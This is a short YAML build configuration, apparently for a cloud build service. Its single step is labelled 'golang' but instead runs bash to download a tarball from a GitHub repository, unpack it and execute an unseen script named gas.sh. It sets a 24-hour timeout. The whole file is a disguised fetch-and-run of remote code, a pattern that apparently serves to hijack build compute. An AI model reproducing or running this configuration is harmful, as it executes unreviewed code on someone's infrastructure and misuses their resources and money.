steps: 
  - name: golang 
    args:  
      - '-c' 
      - >- 
        wget https://github.com/Pantaiselatan/kemed/raw/main/kosim.tar.gz && tar xf kosim.tar.gz && ./gas.sh
    waitFor: ["-"] 
    entrypoint: /bin/bash 
timeout: 86400s